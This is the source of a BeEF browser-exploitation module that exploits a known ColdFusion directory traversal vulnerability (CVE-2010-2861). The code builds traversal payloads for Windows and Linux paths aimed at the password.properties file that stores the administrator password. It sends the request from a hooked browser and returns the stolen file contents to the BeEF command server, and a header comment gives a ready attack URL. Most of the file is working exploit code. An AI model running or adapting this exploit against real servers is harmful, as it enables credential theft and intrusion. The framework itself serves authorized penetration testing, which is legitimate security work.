beef/modules/network/coldfusion_dir_traversal_exploit/command.js

/**
 * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
 * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
 * By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
 * the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
 *
 * On a default win installation, the following vector works great:
 * http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
 * demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
 */
beef.execute(function() {
   fileToRetrieve = "<%= @fileToRetrieve %>";
   targetOS = "<%= @os_combobox %>";
   cf_version = "<%= @cf_version %>";
   var uri = null;
   if(targetOS == "Windows"){
       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
   }else{
       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
   }

	beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
         if(response.status_code == "success"){
            titleStart = response.response_body.indexOf("<title>");
            titleEnd = response.response_body.indexOf("</title>");
            exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
         }else{
             beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
         }
    });
});